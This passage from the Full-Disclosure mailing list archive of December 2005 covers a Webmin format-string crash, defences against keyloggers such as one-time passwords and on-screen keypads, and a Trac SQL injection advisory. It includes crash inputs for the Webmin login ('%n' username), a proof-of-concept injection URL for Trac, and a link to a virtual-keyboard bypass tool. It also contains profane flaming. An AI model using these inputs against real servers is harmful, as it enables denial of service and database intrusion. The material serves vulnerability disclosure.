believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From giarc at freenet.de Thu Dec 1 17:12:13 2005 From: giarc at freenet.de (giarc at freenet.de) Date: Thu, 01 Dec 2005 18:12:13 +0100 Subject: [Full-disclosure] re: webmin remote format string bug Message-ID: An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/568166db/attachment.html -------------- next part -------------- Hello! I succeeded in crashing webmin 1.230 with: username %n password aaaa after klicking 4 times on "Login" webmin was dead. There were no logs at all, and no error was shown in the web interface... Any idea if it's really exploitable (executing code I mean)? Is anyone working on a POC? giarc at freeet.de Original message: --------------------------------------------------------- To: full-disclosure at lists.grok.org.uk Date: Tue, 29 Nov 2005 11:15:20 -0600 On Tuesday 29 November 2005 04:07, advisory at dyadsecurity.com wrote: > [snip ] so so if remote code execution is successful, it would > lead to a full remote root compromise in a standard configuration. > DESCRIPTION. ?The username parameter of the login form is logged via > the perl `syslog' facility in an unsafe manner during a unknown user > login attempt. the perl syslog facility passes the username on to the > variable argument function sprintf that will treat any format > specifiers and process them accordingly. > > DETAILS. ?The vectors for a simple DoS of the web server are to use the > %n and %0(large number)d inside of the username parameter, with the > former causing a write protection fault within perl leading to script > abortion, and the latter causing a large amount of memory to be > allocated inside of the perl process. Sys::Syslog calls sprintf($format, @_). I tried testing this on perl 5.8.7 and don't see how this can be exploitable. ?The %n specifier results in the following error message: $ perl -e 'sprintf("%n")' Modification of a read-only value attempted at -e line 1. Using a thousand %p's results in the same address (presumably of the temporary char *) over and over again It is possible to memory starve webmin with a long %9999999999d string, but arbitrary memory writes seem to be out of the question. What version of perl was used by the third-party to exploit this? From craig at freenet.de Thu Dec 1 17:14:08 2005 From: craig at freenet.de (craig at freenet.de) Date: Thu, 01 Dec 2005 18:14:08 +0100 Subject: [Full-disclosure] re: webmin remote format string bug Message-ID: An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/28b6f430/attachment.html -------------- next part -------------- Hello! I succeeded in crashing webmin 1.230 with: username %n password aaaa after klicking 4 times on "Login" webmin was dead. There were no logs at all, and no error was shown in the web interface... Any idea if it's really exploitable (executing code I mean)? Is anyone working on a POC? giarc at freeet.de Original message: --------------------------------------------------------- To: full-disclosure at lists.grok.org.uk Date: Tue, 29 Nov 2005 11:15:20 -0600 On Tuesday 29 November 2005 04:07, advisory at dyadsecurity.com wrote: > [snip ] so so if remote code execution is successful, it would > lead to a full remote root compromise in a standard configuration. > DESCRIPTION. The username parameter of the login form is logged via > the perl `syslog' facility in an unsafe manner during a unknown user > login attempt. the perl syslog facility passes the username on to the > variable argument function sprintf that will treat any format > specifiers and process them accordingly. > > DETAILS. The vectors for a simple DoS of the web server are to use the > %n and %0(large number)d inside of the username parameter, with the > former causing a write protection fault within perl leading to script > abortion, and the latter causing a large amount of memory to be > allocated inside of the perl process. Sys::Syslog calls sprintf($format, @_). I tried testing this on perl 5.8.7 and don't see how this can be exploitable. The %n specifier results in the following error message: $ perl -e 'sprintf("%n")' Modification of a read-only value attempted at -e line 1. Using a thousand %p's results in the same address (presumably of the temporary char *) over and over again It is possible to memory starve webmin with a long %9999999999d string, but arbitrary memory writes seem to be out of the question. What version of perl was used by the third-party to exploit this? From david.harker at oneiria.co.uk Thu Dec 1 17:51:53 2005 From: david.harker at oneiria.co.uk (David Harker) Date: Thu, 01 Dec 2005 17:51:53 +0000 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: <438F3839.2070606@oneiria.co.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 It may be easier and safer to require the user to follow onscreen instructions for character substitution into their password than attempt to defeat many individual bits of software. Since it's online, a munged dynamic image could be used to supply the instructions quite easily... just a thought. D Shannon Johnston wrote: > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. > > Thanks, > Shannon > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.1 (GNU/Linux) Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org iD8DBQFDjzg5v9m3+Z4yoCYRAk5IAJ9jBdNNzoQHcv9SZyUAz4GepY4qqQCfTjGx Z2FsjbgSsaXirw2sCj9Nd1c= =PjH9 -----END PGP SIGNATURE----- From ckopacsi at gmail.com Thu Dec 1 19:35:11 2005 From: ckopacsi at gmail.com (Christian kopacsi) Date: Thu, 1 Dec 2005 14:35:11 -0500 Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: <2be58a30511240143x745de181g3a31e79528b60e52@mail.gmail.com> References: <112420050024.28438.4385084D0006686500006F1622073000339C9C0E9D090D0E9D0CD29D019B0E020A9C@comcast.net> <2be58a30511240143x745de181g3a31e79528b60e52@mail.gmail.com> Message-ID: InfoSecBOFH, Show me on the doll where they touched you. You should see a therapist to get a grip on all your issues. And why would you talk shit about Clement? He has done so much for the Infosec community. On 11/24/05, InfoSecBOFH wrote: > > Bottom line is... and you can ignore the SANS instructor/SANS zealot > post... > > SANS = SHIT. > > Now that I am in a position with my employer to hire and fire > people... I will not even consider an applicant who touts his SANS > certification as something to be proud of or something to make him > more skilled than the next. > > And, now that I am in a senior position at my employer, I am doing > everything I can to stop my employer from paying the EXTORTION fees to > SANS in order to be a part of their what works program and any of > their training. > > You know what makes me smile everyday... the knowledge in knowing that > I am not the only senior infosec person at a major corporation who > feels this way about SANS. > > Fuck SANS. FUCK EM ALL! > > http://dictionary.reference.com/search?q=sans#without > > sans ( P ) Pronunciation Key (snz, s?) > prep. > Without. > > > > -------------------------------------------------------------------------------- > [Middle English, from Old French, blend of Latin sine, without, and > absenti, in the absence of, ablative of absentia, absence from absns, > absent- present participle of abesse, to be away. See absent.] > > On 11/23/05, senator.crabgrass at comcast.net > wrote: > > Maybe it is not what you know but who you know. Best of luck with that > grail thing, finding it is veiled, holding it is easy, keeping it polished > is where the work is. > > > > -- > > vote for me > > > > > > > On 11/23/05, senator.crabgrass at comcast.net > > > wrote: > > > > ... the cert game is nothing more than a lucrative revenue > generator. For > > > either the test givers or the vender pusher or the land of test king. > > > > > > a few respectable names in their roster[1]; i wonder why they don't > > > name the instructor giving each presentation on their conference > > > schedule[2]... > > > > > > i have a theory: the more legitimately skilled you are, the less you > > > instruct and the more you are paid. a nice way to convert reputation > > > into ca$h! > > > > > > [maybe i can get in on this racket once i attain the holy grail of > > > CPA, GCFW, CISSP, CISM, CISA, CCNA, CCSE, CCSA, GIAC, GCIA, GSNA, > > > GCFA, GCIH, GCUX, GSEC, QUE, WTFBBQ] > > > > > > 1. http://www.sans.org/instructors.php > > > 2. http://www.sans.org/index.php > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20051201/82a2efc8/attachment.html From davek_throwaway at hotmail.com Thu Dec 1 19:43:30 2005 From: davek_throwaway at hotmail.com (Dave Korn) Date: Thu, 1 Dec 2005 19:43:30 -0000 Subject: [Full-disclosure] Re: Most common keystroke loggers? References: <1133457890.12950.80.camel@localhost> <438F448F.402@thievco.com> Message-ID: Blue Boar wrote in news:438F448F.402 at thievco.com > Shannon Johnston wrote: >> Hi All, >> I'm looking for input on what you all believe the most common keystroke >> loggers are. I've been challenged to write an authentication method (for >> a web site) that can be secure while using a compromised system. > > I don't think that's possible for all compromise situations, given > today's desktop OS software. How about one-time passwords? Just go ahead and *let* them keylog it all they like; by the time they've snarfed a pw, it's no use any more. (See S/Key for more details.) cheers, DaveK -- Can't think of a witty .sigline today.... From gugdias at gmail.com Thu Dec 1 20:08:31 2005 From: gugdias at gmail.com (Gustavo) Date: Thu, 1 Dec 2005 18:08:31 -0200 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <1133457890.12950.80.camel@localhost> References: <1133457890.12950.80.camel@localhost> Message-ID: <47ed8a210512011208i17bcbde7l@mail.gmail.com> If you want to provide reliable authentication, given that the user has a keystroke logger installed, you may simply use a visual keyboard written in Java. regards, Gustavo 2005/12/1, Shannon Johnston : > Hi All, > I'm looking for input on what you all believe the most common keystroke > loggers are. I've been challenged to write an authentication method (for > a web site) that can be secure while using a compromised system. > > Thanks, > Shannon > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From Thierry at Zoller.lu Thu Dec 1 20:21:13 2005 From: Thierry at Zoller.lu (Thierry Zoller) Date: Thu, 1 Dec 2005 21:21:13 +0100 Subject: [Full-disclosure] Re: Most common keystroke loggers? In-Reply-To: References: <1133457890.12950.80.camel@localhost> <438F448F.402@thievco.com> Message-ID: <12110056157.20051201212113@Zoller.lu> Dear Dave Korn, DK> How about one-time passwords? Just go ahead and *let* them keylog it all DK> they like; by the time they've snarfed a pw, it's no use any more. (See DK> S/Key for more details.) ITAN I hear you scream. Oh yes.. keylogger fakes that the OTP is not accepted, user enters a new one. Thief has a working OTP. -- http://secdev.zoller.lu Thierry Zoller Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 From mail at hackingspirits.com Thu Dec 1 20:23:09 2005 From: mail at hackingspirits.com (Debasis Mohanty) Date: Fri, 2 Dec 2005 01:53:09 +0530 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F448F.402@thievco.com> Message-ID: <20051201202313.1E34AC31@lists.grok.org.uk> -----Original Message----- From: Blue Boar Sent: Friday, December 02, 2005 12:15 AM To: sjohnston at cavionplus.com Cc: full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Most common keystroke loggers? Shannon Johnston wrote: > Hi All, > I'm looking for input on what you all believe the most common > keystroke loggers are. I've been challenged to write an authentication > method (for a web site) that can be secure while using a compromised system. >> If, for some reason, you only care about the case where a "keylogger" is installed, >> then you can go with some scheme like making the user pick numbers of a randomly-scrambled >> keypad on the screen, with the mouse. "Security" and "randomly-scrambled online keypad" are mutually exclusive ;-) >> Note, however, that "keyloggers" that grab some portion of the screen surrounding the >> mouse pointer every time you click have already been observed in the wild. They are >> designed to specifically defeat this kind of mechanism. I posted a similar but yet an effective way of snatching the user credentials directly from the input boxes while the user key'n them in a pre-compromised box. The method shown is bit effective compared to the screenshot grabbers in the sense that it directly get the clear text and the ***** text from the inputbox directly and donsn't save it until the user submit the form. The PoC (defeat-citibank-vk.zip) was created to defeat the virtual keyboard concept of Citi-Bank used world wide. It can be downloaded from the following link - http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html . Presently, the PoC wont work as CitiBank has made little changes in its site after the release of the PoC. - D From infosecbofh at gmail.com Thu Dec 1 20:14:32 2005 From: infosecbofh at gmail.com (InfoSecBOFH) Date: Thu, 1 Dec 2005 12:14:32 -0800 Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: References: <112420050024.28438.4385084D0006686500006F1622073000339C9C0E9D090D0E9D0CD29D019B0E020A9C@comcast.net> <2be58a30511240143x745de181g3a31e79528b60e52@mail.gmail.com> Message-ID: <2be58a30512011214y7883acd2t2ac1aaf536bae126@mail.gmail.com> On 12/1/05, Christian kopacsi wrote: > InfoSecBOFH, > Show me on the doll where they touched you. You should see a therapist to > get a grip on all your issues. And why would you talk shit about Clement? > He has done so much for the Infosec community. Now that is a great response. Done so much for the infosec community... yeah like SANS has. From toddtowles at brookshires.com Thu Dec 1 20:32:03 2005 From: toddtowles at brookshires.com (Todd Towles) Date: Thu, 1 Dec 2005 14:32:03 -0600 Subject: [Full-disclosure] Re: Most common keystroke loggers? Message-ID: <9E97F0997FB84D42B221B9FB203EFA2701DA4B41@dc1ms2.msad.brookshires.net> If the user is passed to a phishing site that ask for the OTP, the user enters it, the phishing site can return a error and instruct the user to use the next OTP password, hence giving the attacker any number of OTP....the OTP ones that are list based anyways. > -----Original Message----- > From: full-disclosure-bounces at lists.grok.org.uk > [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf > Of Thierry Zoller > Sent: Thursday, December 01, 2005 2:21 PM > To: Dave Korn > Cc: full-disclosure at lists.grok.org.uk > Subject: Re: [Full-disclosure] Re: Most common keystroke loggers? > > Dear Dave Korn, > > DK> How about one-time passwords? Just go ahead and *let* > them keylog > DK> it all they like; by the time they've snarfed a pw, it's > no use any > DK> more. (See S/Key for more details.) > ITAN I hear you scream. Oh yes.. keylogger fakes that the OTP > is not accepted, user enters a new one. Thief has a working OTP. > > -- > http://secdev.zoller.lu > Thierry Zoller > Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7 > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From gat0r at toughguy.net Thu Dec 1 20:35:57 2005 From: gat0r at toughguy.net (gat0r) Date: Thu, 01 Dec 2005 21:35:57 +0100 Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: <2be58a30512011214y7883acd2t2ac1aaf536bae126@mail.gmail.com> Message-ID: Hello pot...this is kettle....jeeeeeessh! On 12/1/05 9:14 PM, "InfoSecBOFH" wrote: > On 12/1/05, Christian kopacsi wrote: >> InfoSecBOFH, >> Show me on the doll where they touched you. You should see a therapist to >> get a grip on all your issues. And why would you talk shit about Clement? >> He has done so much for the Infosec community. > > Now that is a great response. Done so much for the infosec > community... yeah like SANS has. > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From bkfsec at sdf.lonestar.org Thu Dec 1 20:42:00 2005 From: bkfsec at sdf.lonestar.org (bkfsec) Date: Thu, 01 Dec 2005 15:42:00 -0500 Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: References: Message-ID: <438F6018.6080201@sdf.lonestar.org> Josh Perrymon wrote: >WildCAT BBS Anyone???? :) > >I remember playing tradewars and calling who knows where to get new text >files :) > >Used Tone-loC a lot more back then :) > > > And Renegade, WWIV, MajorBBS + clones... Those were the days. I remember Tradewars, but I was more of a BRE fan myself. L.O.R.D. was good for a laugh. Heh. Satan and l0pht releases as well as quota-based download queues which required equal uploads to be able to get anything. I have to say, the best way to get an education in hacking is to actually set up a private network and start banging on things. I think that actual experience is worth so much more than degrees or reading text files. The bottom feeder script kiddies couldn't hold a candle to what we were doing those days. -bkfsec From bkfsec at sdf.lonestar.org Thu Dec 1 20:44:07 2005 From: bkfsec at sdf.lonestar.org (bkfsec) Date: Thu, 01 Dec 2005 15:44:07 -0500 Subject: [Full-disclosure] Hacking Boot camps! In-Reply-To: <78744869705CEF41A32C103C5C04F2200163A824@phxexc1.dswa.net> References: <78744869705CEF41A32C103C5C04F2200163A824@phxexc1.dswa.net> Message-ID: <438F6097.60108@sdf.lonestar.org> Christopher Carpenter wrote: >Yeah, and if you didn't register V-X after like 90 days, it formatted >your hard drive. > >Imagine if an application tried that today. > > > They'd defend their position as a DRM strategy and after a long battle would finally recall their products, only leaving them on store shelves? (I'm not claiming that XCP does that, rather I'm making a point about malicious code in products.) -bkfsec From perrymonj at networkarmor.com Thu Dec 1 20:58:58 2005 From: perrymonj at networkarmor.com (Josh Perrymon) Date: Thu, 1 Dec 2005 14:58:58 -0600 Subject: [Full-disclosure] Hacking Boot camps! Message-ID: Very True.. The BBS and door game back in the days kept me interested to learn and luckily I get to down security full time now... it's just fun.. ( mostly ) I remember back when we where all playing doom on 9600 modems and hacking around with the USR robotic connection strings.. I really enjoyed that. It sparked a pure interest in learning about those damn computers :) I learned my first hack setting up the same software and door games as the BBS had at home and learning what files did what and where the configs where :) Not trying to get into some old skool kick or anything( I'm not even 30 yet ) I just got lucky enough to do something I really enjoy. JP ANSI IS STILL COOL -----Original Message----- From: bkfsec [mailto:bkfsec at sdf.lonestar.org] Sent: Thursday, December 01, 2005 3:42 PM To: Josh Perrymon Cc: xyberpix; wilder_jeff Wilder; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] Hacking Boot camps! Josh Perrymon wrote: >WildCAT BBS Anyone???? :) > >I remember playing tradewars and calling who knows where to get new text >files :) > >Used Tone-loC a lot more back then :) > > > And Renegade, WWIV, MajorBBS + clones... Those were the days. I remember Tradewars, but I was more of a BRE fan myself. L.O.R.D. was good for a laugh. Heh. Satan and l0pht releases as well as quota-based download queues which required equal uploads to be able to get anything. I have to say, the best way to get an education in hacking is to actually set up a private network and start banging on things. I think that actual experience is worth so much more than degrees or reading text files. The bottom feeder script kiddies couldn't hold a candle to what we were doing those days. -bkfsec From dave at immunitysec.com Thu Dec 1 21:10:33 2005 From: dave at immunitysec.com (Dave Aitel) Date: Thu, 01 Dec 2005 16:10:33 -0500 Subject: [Full-disclosure] re: webmin remote format string bug In-Reply-To: References: Message-ID: <438F66C9.5030308@immunitysec.com> This is exploitable - Immunity has a PoC exploit in our Partner's section written by Bas Alberts. Thanks, Dave Aitel Immunity, Inc. craig at freenet.de wrote: > Hello! > I succeeded in crashing webmin 1.230 with: > > username %n > password aaaa > > after klicking 4 times on "Login" webmin was dead. > There were no logs at all, and no error was shown in the web interface... > Any idea if it's really exploitable (executing code I mean)? Is anyone working on a POC? > > giarc at freeet.de > > > > > > From michael.holstein at csuohio.edu Thu Dec 1 21:26:05 2005 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Thu, 01 Dec 2005 16:26:05 -0500 Subject: [Full-disclosure] Re: Most common keystroke loggers? In-Reply-To: <9E97F0997FB84D42B221B9FB203EFA2701DA4B41@dc1ms2.msad.brookshires.net> References: <9E97F0997FB84D42B221B9FB203EFA2701DA4B41@dc1ms2.msad.brookshires.net> Message-ID: <438F6A6D.3070306@csuohio.edu> > If the user is passed to a phishing site that ask for the OTP, the user > enters it, the phishing site can return a error and instruct the user to > use the next OTP password, hence giving the attacker any number of > OTP....the OTP ones that are list based anyways. Social Darwinism : Try to make something idiot-proof, nature will provide you with a better idiot. From michael.holstein at csuohio.edu Thu Dec 1 21:27:07 2005 From: michael.holstein at csuohio.edu (Michael Holstein) Date: Thu, 01 Dec 2005 16:27:07 -0500 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <47ed8a210512011208i17bcbde7l@mail.gmail.com> References: <1133457890.12950.80.camel@localhost> <47ed8a210512011208i17bcbde7l@mail.gmail.com> Message-ID: <438F6AAB.1000307@csuohio.edu> > If you want to provide reliable authentication, given that the user > has a keystroke logger installed, you may simply use a visual keyboard > written in Java. Banks have already started doing this .. and phishers have responded with framegrabbing loggers. ~Mike. From david.maciejak at kyxar.fr Thu Dec 1 21:52:01 2005 From: david.maciejak at kyxar.fr (David Maciejak) Date: Thu, 1 Dec 2005 22:52:01 +0100 Subject: [Full-disclosure] Edgewall Trac SQL Injection Vulnerability Message-ID: <1133473921.438f7081d6f41@webmail.kyxar.fr> Edgewall Trac SQL Injection Vulnerability Trac is an enhanced wiki and issue tracking system for software development project. It provides an interface to Subversion. More information on http://projects.edgewall.com/trac/ Description: Malicious user can conduct SQL injection in ticket query module because supplied 'group' URI data passed to the query script is not properly sanitized. PoC: http://host/trac/query?group=/* Vulnerable version: Version tested is 0.9 Maybe 0.9 betas are also vulnerable Solution: Upgrade to version 0.9.1 http://projects.edgewall.com/trac/wiki/TracDownload Thanks for the quick fix of the Trac Team ! David Maciejak -------------------------------------------------------------------------------- KYXAR.FR - Mail envoy? depuis http://webmail.kyxar.fr From adf at code511.com Thu Dec 1 22:26:28 2005 From: adf at code511.com (deepquest) Date: Thu, 1 Dec 2005 23:26:28 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <20051201180457.GC9386@foofus.net> References: <1133457890.12950.80.camel@localhost> <200512011757.jB1HvHmn021363@turing-police.cc.vt.edu> <20051201180457.GC9386@foofus.net> Message-ID: To me the only thing that can defeat keystroke is what a software or trojan can not do: See (OCR is just a partial application of guess but not applicable in that case) Imagine a web page with a virtual keyboard page (clickable). In order to prevent the localisation on the keys mapping based on position of the mouse, display the keyboard on random location of the screen. Add a random password and challenge authentication process. my 2 cents, Deepquest "Justification of windows usage is a combinaison of Stockholm Syndrome and cognitive dissonance." -------------------------------------------------------------- Propaganda http://deepquest.code511.com/blog FIB http://www.futureisbeta.com PGP DH/DSS http://www.futureisbeta.com/pgp -------------------------------------------------------------- From nick at virus-l.demon.co.uk Thu Dec 1 22:33:09 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 11:33:09 +1300 Subject: [Full-disclosure] Re: Most common keystroke loggers? In-Reply-To: Message-ID: <439030F5.31961.2C5AC6B8@gmail.com> Dave Korn wrote: > How about one-time passwords? Just go ahead and *let* them keylog it all > they like; by the time they've snarfed a pw, it's no use any more. (See > S/Key for more details.) Ignoring the silliness of pre-printed lists of of OTP (such as some European banking systems' TANs) and the ease of extracting a few from gullible users, even dynamically generated OTPs are still vulnerable to man-in-the-middling _if_ the bad guy has code running on the device by which the user interacts with whatever service the OP is hoping to "protect". I know the OP said "keylogger compromised", but if the machine _is_ compromised (and you can't tell from your remote web server) as the folk running the server you have no control over how it was compromised, so that is a chronically arbitrary condition (which suggests to me that the OP doesn't understand his actual problem set). Regards, Nick FitzGerald From nick at virus-l.demon.co.uk Thu Dec 1 22:33:09 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 11:33:09 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <47ed8a210512011208i17bcbde7l@mail.gmail.com> References: <1133457890.12950.80.camel@localhost> Message-ID: <439030F5.16919.2C5AC7D0@gmail.com> Gustavo wrote: > If you want to provide reliable authentication, given that the user > has a keystroke logger installed, you may simply use a visual keyboard > written in Java. Dude -- you really are out of your depth here... Barclays (and other UK banks?) were doing this in the late 90s. Within months keyloggers that took screenshots of a small area around the mouse pointer hot-spot were being found. Some South American banks currently under massive identity theft/keylogging "attack" (like Banco Brasil) apparently don't talk to others in the banking industry, as some have recently started using such "on-screen keyboards" to "defeat" the keylogging attackers that hound their customers. Within a very short time period we saw some of those keyloggers adapt by adding screenshot-grabbing of a small area around the mouse point hot-spot. Seems they talked with uninformed "security consultants" rather than folk who know how systems work, what malware is, what it can do that it may not be doing today and, in this case, what has already been tried and trivially beaten... If you don't understand that all the I/O on the "compromised" machine (for the types of machine we are talking about) can be intercepted, you shouldn't be trying to answer the OP's question (and if the OP understood that, he would not have asked as he would have realized he was aiming at doing the impossible). Regards, Nick FitzGerald From nick at virus-l.demon.co.uk Thu Dec 1 22:33:10 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 11:33:10 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <438F3839.2070606@oneiria.co.uk> References: <1133457890.12950.80.camel@localhost> Message-ID: <439030F6.22102.2C5AC99D@gmail.com> David Harker wrote: > It may be easier and safer to require the user to follow onscreen > instructions for character substitution into their password than attempt > to defeat many individual bits of software. Since it's online, a munged > dynamic image could be used to supply the instructions quite easily... > just a thought. Any idea how trivially _and cheaply_ such systems are man-in-the- middled? OK -- so the OP said compromised with a keylogger, but face it -- if the machine is compromised you have NO idea from the remote web server _what_ is running on the machine, so it could be a MitM agent shuffling all your traffic off somewhere else and sending the appropriate responses back and forward between your server the real user and whoever else is needed to crack the puzzle. There are (reputedly -- I've not actually tried to find one for my own use) call-centres in India (?) that will "crack" captchas ("visually garbled while still being humanly readable but (hopefully) not machine- readable/OCR'able images") and the like in real time for a few pennies (or less) per "crack". And, if there aren't and what the OP is trying to "protect" is valuable enough, the bad guys wanting access to it can certainly setup something of their own along those lines for the duration of their attack. Depending on exactly what you mean (it's not entirely clear to me) it may just be sufficient to record the keystrokes _and_ a screenhot so the theif can later reverse the substitution cypher (if that's what you mean by "require the user to follow onscreen instructions for character substitution into their password"). And, finally, asking the user to be the encryption implementation is going to be very slow and error-prone -- not at all usable... Regards, Nick FitzGerald From adf at code511.com Thu Dec 1 22:35:07 2005 From: adf at code511.com (deepquest) Date: Thu, 1 Dec 2005 23:35:07 +0100 Subject: Fwd: [HWU-83468]: Re: [Full-disclosure] Most common keystroke loggers? References: Message-ID: <8809E02F-425A-4497-A53D-F3AA5DCB63D7@code511.com> Spamo-Squaters on FD list? Nice auto-reply. We should do a hall shame for those! -D D?but du message r?exp?di? : > De : "4Daily.com Hotline" > Date : 1 d?cembre 2005 23:28:02 HNEC > ? : adf at code511.com > Objet : [HWU-83468]: Re: [Full-disclosure] Most common keystroke > loggers? > > ====== Please reply above this line ====== > > deepquest, > > Your ticket has been submitted to our Hotline department, one of > the staff members will review it and reply accordingly. Listed > below are details of this ticket, you will need to use the ticket > key listed below to update the status of this ticket from web. > > Ticket ID: HWU-83468 > Ticket Key: 9527a44c > Subject: Re: [Full-disclosure] Most common keystroke loggers? > Department: Hotline > > You can check the status or reply to this ticket online at http:// > 4daily.com/help/index.php? > _a=tickets&_m=viewmain&emailre=adf at code511.com&ticketkeyre=9527a44c&_i > =HWU-83468 > > There were some possible answers to this ticket in our > knowledgebase, they are listed below: > Why do I get logged out? > http://4daily.com/help/index.php? > _a=knowledgebase&_j=questiondetails&_i=11&ticketid2=HWU-83468&ticketke > y2=9527a44c&doclose=1 > > A simple step-by-step strategy > http://4daily.com/help/index.php? > _a=knowledgebase&_j=questiondetails&_i=32&ticketid2=HWU-83468&ticketke > y2=9527a44c&doclose=1 > > How do I get paid? > http://4daily.com/help/index.php? > _a=knowledgebase&_j=questiondetails&_i=18&ticketid2=HWU-83468&ticketke > y2=9527a44c&doclose=1 > > > > Please let us know if we can assist you any further, > > 4Daily.com > > > From lyal.collins at key2it.com.au Thu Dec 1 22:41:55 2005 From: lyal.collins at key2it.com.au (Lyal Collins) Date: Fri, 2 Dec 2005 09:41:55 +1100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: Message-ID: <006b01c5f6c8$6ea4bfb0$6600a8c0@kpllaptop> In 1996, this virtual keypad concept was broken by taking 10x10 pixel images under the cursor click, showing the number/letters used in that password. Virtual keypads are just a minor change of tactics, not a long term resolution to this risk, imho. Lyal -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of deepquest Sent: Friday, 2 December 2005 9:26 AM To: foofus at foofus.net Cc: Full-Disclosure Subject: Re: [Full-disclosure] Most common keystroke loggers? To me the only thing that can defeat keystroke is what a software or trojan can not do: See (OCR is just a partial application of guess but not applicable in that case) Imagine a web page with a virtual keyboard page (clickable). In order to prevent the localisation on the keys mapping based on position of the mouse, display the keyboard on random location of the screen. Add a random password and challenge authentication process. my 2 cents, Deepquest "Justification of windows usage is a combinaison of Stockholm Syndrome and cognitive dissonance." -------------------------------------------------------------- Propaganda http://deepquest.code511.com/blog FIB http://www.futureisbeta.com PGP DH/DSS http://www.futureisbeta.com/pgp -------------------------------------------------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From adf at code511.com Thu Dec 1 22:43:53 2005 From: adf at code511.com (deepquest) Date: Thu, 1 Dec 2005 23:43:53 +0100 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: <006b01c5f6c8$6ea4bfb0$6600a8c0@kpllaptop> References: <006b01c5f6c8$6ea4bfb0$6600a8c0@kpllaptop> Message-ID: > In 1996, this virtual keypad concept was broken by taking 10x10 > pixel images > under the cursor click, showing the number/letters used in that > password. > > Virtual keypads are just a minor change of tactics, not a long term > resolution to this risk, imho. I agree but what about the second random password and challenge authentification? Both should be unique and usage once. -D From very at unprivate.com Thu Dec 1 22:47:32 2005 From: very at unprivate.com (php0t) Date: Thu, 1 Dec 2005 23:47:32 +0100 Subject: [Full-disclosure] Most common keystroke loggers? References: <006b01c5f6c8$6ea4bfb0$6600a8c0@kpllaptop> Message-ID: <009301c5f6c9$371f6170$0200a8c0@DORKA> How'bout adding direct printing on lpt of new one-time usage passwords? :) In order to get the passwords, they'd have to hook the printing, too. Not too common, yet. > I agree but what about the second random password and challenge > authentification? Both should be unique and usage once. From nick at virus-l.demon.co.uk Thu Dec 1 23:01:14 2005 From: nick at virus-l.demon.co.uk (Nick FitzGerald) Date: Fri, 02 Dec 2005 12:01:14 +1300 Subject: [Full-disclosure] Most common keystroke loggers? In-Reply-To: References: <20051201180457.GC9386@foofus.net> Message-ID: <4390378A.8503.2C747DDB@gmail.com> deepquest wrote: > To me the only thing that can defeat keystroke is what a software or > trojan can not do: See (OCR is just a partial application of guess > but not applicable in that case) Then you are so far inside the box you cannot see the walls... The OP said "keystroke logger" BUT he also said "compromised". If the machine is compromised you cannot limit yourself to "keylogging" as a compromised machine may be running _anything_ (including something not yet written, as we are talking about a hypothetical future situation, so the OP limiting the original question to "the most common keylogger" is further evidence that the OP does not understand the actual problem set he has been posed). > Imagine a web page with a virtual keyboard page (clickable). In order > to prevent the localisation on the keys mapping based on position of > the 